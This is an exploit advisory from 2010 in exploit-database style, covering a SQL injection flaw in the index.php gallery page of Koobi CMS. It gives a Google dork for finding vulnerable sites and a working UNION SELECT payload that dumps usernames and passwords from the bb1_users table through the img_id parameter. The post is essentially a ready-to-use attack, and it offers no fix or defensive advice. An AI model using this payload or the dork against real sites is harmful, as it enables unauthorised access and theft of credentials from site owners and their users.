=====================================================
  Koobi CMS (index.php) SQL Injection Vulnerability
=====================================================
 
 ____    ______   __          __    __  __  ____    ______   _____     
/\  _`\ /\__  _\ /\ \       /'__`\ /\ \/\ \/\  _`\ /\__  _\ /\  __`\   
\ \,\L\_\/_/\ \/ \ \ \     /\_\L\ \\ \ `\\ \ \ \/\_\/_/\ \/ \ \ \/\ \  
 \/_\__ \  \ \ \  \ \ \  __\/_/_\_<_\ \ , ` \ \ \/_/_ \ \ \  \ \ \ \ \ 
   /\ \L\ \ \_\ \__\ \ \L\ \ /\ \L\ \\ \ \`\ \ \ \L\ \ \_\ \__\ \ \_\ \
   \ `\____\/\_____\\ \____/ \ \____/ \ \_\ \_\ \____/ /\_____\\ \_____\
    \/_____/\/_____/ \/___/   \/___/   \/_/\/_/\/___/  \/_____/ \/_____/
                                                                         
 
 
 
# Exploit Title :    Koobi CMS (index.php) SQL Injection Vulnerability
 
# Date :             July 12  2010
 
# Author :           SIL3NCIO
 
# Email :            617a6572@gmail.com
 
# Version:           4.3.0 & 4.2.5 & 4.2.4 Maybe Higher Versions are affected too
 
# Tested on:         Win Xp Sp3
 
# Dork :             inurl:"index.php?p=gallerypic img_id"
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Exploit~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
[Exploit] :  http://site.com/path/index.php?p=gallerypic&img_id=[SQLi]
 
-188+union+select+1,2,3,group_concat(username,0x3a,password),5,6,7,8,9+from+bb1_users--
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Note : Proud to be Tunisian